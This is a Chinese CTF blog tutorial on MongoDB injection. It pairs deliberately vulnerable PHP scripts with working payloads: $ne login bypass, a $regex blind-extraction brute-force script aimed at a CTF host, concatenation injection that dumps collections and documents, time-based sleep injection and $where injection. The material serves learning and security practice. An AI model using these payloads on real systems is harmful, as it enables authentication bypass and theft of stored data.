<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="MongoDB,">










<meta name="description" content="之前做比赛题经常会遇到mongodb注入，每次都一知半解一脸懵逼，总结一下   MongoDB概括记下增删改查（php5）   直接调用类方法1234567$mongodb = new mongoclient();  //建立连接$db = $mongodb-&amp;gt;myinfo;  //选择数据库$coll = $db-&amp;gt;test;  //选择集合$coll-&amp;gt;save();  //">
<meta name="keywords" content="MongoDB">
<meta property="og:type" content="article">
<meta property="og:title" content="MongoDB注入">
<meta property="og:url" content="https://xi4or0uji.github.io/2019/02/27/2019-2-27-MongoDB注入/index.html">
<meta property="og:site_name" content="蒟蒻的ctf博客">
<meta property="og:description" content="之前做比赛题经常会遇到mongodb注入，每次都一知半解一脸懵逼，总结一下   MongoDB概括记下增删改查（php5）   直接调用类方法1234567$mongodb = new mongoclient();  //建立连接$db = $mongodb-&amp;gt;myinfo;  //选择数据库$coll = $db-&amp;gt;test;  //选择集合$coll-&amp;gt;save();  //">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-03-01T10:41:30.826Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="MongoDB注入">
<meta name="twitter:description" content="之前做比赛题经常会遇到mongodb注入，每次都一知半解一脸懵逼，总结一下   MongoDB概括记下增删改查（php5）   直接调用类方法1234567$mongodb = new mongoclient();  //建立连接$db = $mongodb-&amp;gt;myinfo;  //选择数据库$coll = $db-&amp;gt;test;  //选择集合$coll-&amp;gt;save();  //">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://xi4or0uji.github.io/2019/02/27/2019-2-27-MongoDB注入/">





  <title>MongoDB注入 | 蒟蒻的ctf博客</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">蒟蒻的ctf博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://xi4or0uji.github.io/2019/02/27/2019-2-27-MongoDB注入/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Xi4or0uji">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="蒟蒻的ctf博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">MongoDB注入</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-02-27T21:10:55+08:00">
                2019-02-27
              </time>
            

            

            
          </span>
		  


          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index">
                    <span itemprop="name">web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2019/02/27/2019-2-27-MongoDB注入/" class="leancloud_visitors" data-flag-title="MongoDB注入">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>之前做比赛题经常会遇到mongodb注入，每次都一知半解一脸懵逼，总结一下  </p>
<h4 id="MongoDB概括"><a href="#MongoDB概括" class="headerlink" title="MongoDB概括"></a>MongoDB概括</h4><p>记下增删改查（php5）  </p>
<h5 id="直接调用类方法"><a href="#直接调用类方法" class="headerlink" title="直接调用类方法"></a>直接调用类方法</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$mongodb = <span class="keyword">new</span> mongoclient();  <span class="comment">//建立连接</span></span><br><span class="line">$db = $mongodb-&gt;myinfo;  <span class="comment">//选择数据库</span></span><br><span class="line">$coll = $db-&gt;test;  <span class="comment">//选择集合</span></span><br><span class="line">$coll-&gt;save();  <span class="comment">//增</span></span><br><span class="line">$coll-&gt;find();  <span class="comment">//查</span></span><br><span class="line">$coll-&gt;remove();  <span class="comment">//减</span></span><br><span class="line">$coll-&gt;update();  <span class="comment">//改</span></span><br></pre></td></tr></table></figure>
<h5 id="execute方法"><a href="#execute方法" class="headerlink" title="execute方法"></a>execute方法</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$monggdb = <span class="keyword">new</span> mongoclient();  <span class="comment">//建立连接</span></span><br><span class="line">$db = $monggdb-&gt;myinfo;  <span class="comment">//选择数据库</span></span><br><span class="line">$query = <span class="string">"db.table.save(&#123;'newsid':1&#125;)"</span>;  <span class="comment">//增</span></span><br><span class="line">$query = <span class="string">"db.table.find(&#123;'newsid':1&#125;)"</span>;  <span class="comment">//查</span></span><br><span class="line">$query = <span class="string">"db.table.remove(&#123;'newsid':1&#125;)"</span>;  <span class="comment">//删</span></span><br><span class="line">$query = <span class="string">"db.table.update(&#123;'newsid':1&#125;,&#123;'newsid',2&#125;)"</span>;  <span class="comment">//改</span></span><br><span class="line">$result = $db-&gt;execute($query);  <span class="comment">//执行</span></span><br></pre></td></tr></table></figure>
<p>在php7中的利用会很麻烦，很多函数都不一样了，还有很多坑，所以还是建议php5写<br>php7<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$mongo = <span class="keyword">new</span> MongoDB\Driver\Manager();</span><br><span class="line">$result = $mongo-&gt;executeQuery(<span class="string">'db.collection'</span>, <span class="keyword">new</span> MongoDB\Driver\Query([<span class="string">'uid'</span>=&gt;$id], []), <span class="keyword">new</span> MongoDB\Driver\ReadPreference(MongoDB\Driver\ReadPreference::RP_PRIMARY_PREFERRED));</span><br><span class="line"><span class="comment">// 返回的$result是一个对象，需要手动转换成数组。</span></span><br></pre></td></tr></table></figure></p>
<h4 id="攻击"><a href="#攻击" class="headerlink" title="攻击"></a>攻击</h4><h5 id="基本操作"><a href="#基本操作" class="headerlink" title="基本操作"></a>基本操作</h5><p>在学习注入之前，先要学一下MongoDB的逻辑操作符<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">gt 大于 &#123;"field": &#123;$gt: value&#125;&#125;</span><br><span class="line">lt 小于 &#123;"field": &#123;$lt: value&#125;&#125;</span><br><span class="line">gte 大于等于 &#123;"field": &#123;$gte: value&#125;&#125;</span><br><span class="line">lte 小于等于 &#123;"filed": &#123;$lte: value&#125;&#125;</span><br><span class="line">ne 不等于 &#123;"member.age": &#123;$ne: "nine"&#125;&#125;</span><br><span class="line">exists 是否存在 &#123;"array.0" &#123;$exists: 1&#125;&#125; #数组中是否存在第一条数据</span><br><span class="line">or 或者 &#123;"$or": [&#123;"member.age": "3"&#125;,&#123;"member.name": "h4ck3r"&#125;]&#125;</span><br><span class="line">and 并且 &#123;"$and": [&#123;"member.age": "3"&#125;,&#123;"member.name": "h4ck3r"&#125;]&#125;</span><br><span class="line">regex 正则 (&#123;"name": &#123;"$regex": "^a$"&#125;&#125;)</span><br><span class="line">size 个数 (&#123;"name": &#123;"$size": 3&#125;&#125;) #$size name元素个数为3</span><br></pre></td></tr></table></figure></p>
<h5 id="数组绑定时注入"><a href="#数组绑定时注入" class="headerlink" title="数组绑定时注入"></a>数组绑定时注入</h5><h6 id="ne注入"><a href="#ne注入" class="headerlink" title="$ne注入"></a>$ne注入</h6><p>先去扒一个脚本<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$mongo = <span class="keyword">new</span> mongoclient(<span class="string">"mongodb://127.0.0.1"</span>);</span><br><span class="line">$db = $mongo-&gt;myinfo; <span class="comment">//选择数据库</span></span><br><span class="line">$coll = $db-&gt;test; <span class="comment">//选择集合</span></span><br><span class="line">$username = $_GET[<span class="string">'username'</span>];</span><br><span class="line">$password = $_GET[<span class="string">'password'</span>];</span><br><span class="line">$data = <span class="keyword">array</span>(</span><br><span class="line">        <span class="string">'username'</span>=&gt;$username,</span><br><span class="line">        <span class="string">'password'</span>=&gt;$password</span><br><span class="line">        );</span><br><span class="line">$data = $coll-&gt;find($data);</span><br><span class="line">$count = $data-&gt;count();</span><br><span class="line"><span class="keyword">if</span> ($count&gt;<span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">foreach</span> ($data <span class="keyword">as</span> $user) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'username:'</span>.$user[<span class="string">'username'</span>].<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'password:'</span>.$user[<span class="string">'password'</span>].<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'未找到'</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>可以看到，这个脚本会将输入的username和password扔去数据库找，如果有，就全部显示出来<br>正常我们查询是<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=xiaorouji&amp;password=123456</span><br></pre></td></tr></table></figure></p>
<p>这个时候后台的查询语句是<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">db.test.find(&#123;username:<span class="string">'xiaorouji'</span>,password:<span class="string">'123456'</span>&#125;)</span><br></pre></td></tr></table></figure></p>
<p>但是，如果我们输入的语句是<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username[$ne]=xiaorouji&amp;password[$ne]=<span class="number">123456</span></span><br></pre></td></tr></table></figure></p>
<p>这样子，后台语句就会变成<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">db.test.find(&#123;username:&#123;<span class="string">'$ne'</span>:<span class="string">'xiaorouji'</span>&#125;,password:&#123;<span class="string">'$ne'</span>:<span class="string">'123456'</span>&#125;&#125;)</span><br></pre></td></tr></table></figure></p>
<p>这样就能获得后台除了xiaorouji这个账号的其他全部账号的信息了  </p>
<h6 id="regex注入"><a href="#regex注入" class="headerlink" title="$regex注入"></a>$regex注入</h6><p>正则注入跟布尔盲注差不多，也是当页面只返回true或者false的时候，让他去一个个匹配，最终拿到值<br>给一题hctf的题目，后台大致代码如下<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$mongo = <span class="keyword">new</span> mongoclient();</span><br><span class="line">$db = $mongo-&gt;myinfo; <span class="comment">//选择数据库</span></span><br><span class="line">$coll = $db-&gt;test; <span class="comment">//选择集合</span></span><br><span class="line">$lock = $_POST[<span class="string">'lock'</span>];</span><br><span class="line">$key = $_POST[<span class="string">'key'</span>];</span><br><span class="line"><span class="keyword">if</span> (is_array($lock)) &#123;</span><br><span class="line">    $data = <span class="keyword">array</span>(</span><br><span class="line">        <span class="string">'lock'</span>=&gt;$lock);</span><br><span class="line">    $data = $coll-&gt;find($data);</span><br><span class="line">    <span class="keyword">if</span> ($data-&gt;count()&gt;<span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'the lock is right,but wrong key'</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'lock is wrong'</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">if</span> ($lock == <span class="string">'xxxxxxxx'</span>&amp;&amp;$key==<span class="string">'xxxxxxxxx'</span>) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'Your flag is xxxxxxx'</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'lock is wrong'</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>可以看到只有正确和错误的两种回显，payload如下<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">$ch=curl_init();</span><br><span class="line">curl_setopt($ch,CURLOPT_URL,<span class="string">'http://121.40.86.166:23339/'</span>);</span><br><span class="line">curl_setopt($ch,CURLOPT_RETURNTRANSFER,<span class="number">1</span>);</span><br><span class="line">curl_setopt($ch,CURLOPT_POST,<span class="number">1</span>);</span><br><span class="line">$ori = <span class="string">'0123456789abcdefghijklmnopqrstuvwxyz'</span>;</span><br><span class="line">$str = <span class="string">''</span>;</span><br><span class="line"><span class="keyword">for</span> ($i=<span class="number">0</span>; $i &lt;<span class="number">10</span> ; $i++) &#123;</span><br><span class="line">    <span class="keyword">for</span> ($j=<span class="number">0</span>; $j &lt;strlen($ori) ; $j++) &#123; </span><br><span class="line">        $post = <span class="string">'key=1&amp;lock[$regex]=^'</span>.$str.$ori[$j];</span><br><span class="line">        curl_setopt($ch,CURLOPT_POSTFIELDS,$post);</span><br><span class="line">        $data=curl_exec($ch);</span><br><span class="line">        <span class="keyword">if</span> (strlen($data) == <span class="number">319</span>) &#123;</span><br><span class="line">           $str.=$ori[$j];</span><br><span class="line">           <span class="keyword">echo</span> $str.<span class="string">"\r\n"</span>;</span><br><span class="line">           <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>在数据库中的执行语句是<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">db.test.find(&#123;lock:&#123;<span class="string">'$regex'</span>:<span class="string">'^a'</span>&#125;&#125;);</span><br></pre></td></tr></table></figure></p>
<h5 id="拼接字符串注入"><a href="#拼接字符串注入" class="headerlink" title="拼接字符串注入"></a>拼接字符串注入</h5><p>这种注入跟sql里面最基本的回显注入类似，举个栗子<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$username = $_GET[<span class="string">'username'</span>];</span><br><span class="line">$password = $_GET[<span class="string">'password'</span>];</span><br><span class="line">$query = <span class="string">"var data = db.test.findOne(&#123;username:'$username',password:'$password'&#125;);return data;"</span>;</span><br><span class="line"><span class="comment">//$query = "return db.test.findOne();";</span></span><br><span class="line"><span class="comment">//echo $query;</span></span><br><span class="line">$mongo = <span class="keyword">new</span> mongoclient();</span><br><span class="line">$db = $mongo-&gt;myinfo;</span><br><span class="line">$data = $db-&gt;execute($query);</span><br><span class="line"><span class="keyword">if</span> ($data[<span class="string">'ok'</span>] == <span class="number">1</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span> ($data[<span class="string">'retval'</span>]!=<span class="keyword">NULL</span>) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'username:'</span>.$data[<span class="string">'retval'</span>][<span class="string">'username'</span>].<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'password:'</span>.$data[<span class="string">'retval'</span>][<span class="string">'password'</span>].<span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'未找到'</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> $data[<span class="string">'errmsg'</span>];</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>首先我们先尝试一下<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=<span class="number">123</span><span class="string">'&amp;password=123</span></span><br></pre></td></tr></table></figure></p>
<p>这样我们首先会收到报错，因为单引号没有闭合，接下来尝试一个闭合语句<br>这里有个坑点就是高版本的MongoDB好像不支持注释符，所以直接拿注释符注释后面实际上是不行的<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=test<span class="string">'&#125;);return (&#123;username:1,password:2&#125;);var foo = (&#123;'</span>foo<span class="string">':'</span>&amp;password=<span class="number">123</span></span><br></pre></td></tr></table></figure></p>
<p>这样子后台还是可以返回一个数据，也就刚好能绕过前面的限制，获得特定的信息<br>爆mongodb版本<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=test<span class="string">'&#125;);return (&#123;username:version(),password:2&#125;);var foo = (&#123;'</span>foo<span class="string">':'</span></span><br></pre></td></tr></table></figure></p>
<p>爆当前数据库<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=test<span class="string">'&#125;); return (&#123;username:toJson(db),password:2&#125;);var foo = (&#123;'</span>foo<span class="string">':'</span></span><br></pre></td></tr></table></figure></p>
<p>爆所有表<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=test<span class="string">'&#125;); return (&#123;username:toJson(db.getCollectionNames()),password:2&#125;); var foo = (&#123;'</span><span class="number">1</span>&amp;password=<span class="number">123</span></span><br></pre></td></tr></table></figure></p>
<p>查看文档<br><code>db.collection.find()</code>这个函数在无参的时候会返回集合中的所有文档以及里面的所有字段<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">username=test<span class="string">'&#125;); return (&#123;username:toJson(db.test.find()),password:2&#125;); (&#123;foo:'</span><span class="number">123</span>&amp;password=<span class="number">123</span></span><br><span class="line"><span class="comment">#查看单条信息</span></span><br><span class="line">username=test<span class="string">'&#125;); return (&#123;username:toJson(db.test.find()[1]),password:2&#125;); (&#123;foo:'</span><span class="number">123</span>&amp;password=<span class="number">123</span></span><br></pre></td></tr></table></figure></p>
<p>当然这中间还可以有更多的语句操作，不一一列举了  </p>
<h5 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h5><p>跟sql的时间盲注原理相似，放个payload<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=test<span class="string">'&#125;); if (db.version()&gt;"0")&#123;sleep(10000);exit;&#125; var b=(&#123;a:'</span><span class="number">1</span>&amp;password=<span class="number">123</span></span><br></pre></td></tr></table></figure></p>
<p>这样就能成功延时了  </p>
<h5 id="where注入"><a href="#where注入" class="headerlink" title="$where注入"></a>$where注入</h5><p>MongoDB里面的$where跟sql的where很相似，都是加入限制条件进行查询。但是MongoDB里面的$where操作符常常会引入一个js函数作为 限制条件来造成注入<br>后台代码<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$mongo = <span class="keyword">new</span> mongoclient();</span><br><span class="line">$db = $mongo-&gt;myinfo; <span class="comment">//选择数据库</span></span><br><span class="line">$coll = $db-&gt;news; <span class="comment">//选择集合</span></span><br><span class="line">$news = $_GET[<span class="string">'news'</span>];</span><br><span class="line">$function = <span class="string">"function() &#123;if(this.news == '$news') return true&#125;"</span>;</span><br><span class="line"><span class="keyword">echo</span> $function;</span><br><span class="line">$result = $coll-&gt;find(<span class="keyword">array</span>(<span class="string">'$where'</span>=&gt;$function));</span><br><span class="line"><span class="keyword">if</span> ($result-&gt;count()&gt;<span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'该新闻存在'</span>;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'该新闻不存在'</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>上面这个代码如果我们输入<code>news=test&#39;%26%26&#39;1&#39;=&#39;1</code>会返回正常页面，然后输入<code>news=test&#39;%26%26&#39;1&#39;=&#39;2</code>会返回异常页面，那么我们就可以尝试一下进行注入了<br>爆数据表名<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">news=test<span class="string">'%26%26db.getCollectionNames()[0][0]=='</span>m<span class="string">'%26%26'</span><span class="number">1</span><span class="string">'=='</span><span class="number">1</span></span><br></pre></td></tr></table></figure></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/MongoDB/" rel="tag"># MongoDB</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/02/26/2019-2-26-2018-Tokyo-Westerns-CTF/" rel="next" title="2018 Tokyo Westerns CTF">
                <i class="fa fa-chevron-left"></i> 2018 Tokyo Westerns CTF
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/01/2019-3-1-2019安恒杯二月赛/" rel="prev" title="2019安恒杯二月赛">
                2019安恒杯二月赛 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="Xi4or0uji">
            
              <p class="site-author-name" itemprop="name">Xi4or0uji</p>
              <p class="site-description motion-element" itemprop="description">还在路上</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">33</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">分类</span>
                </a>
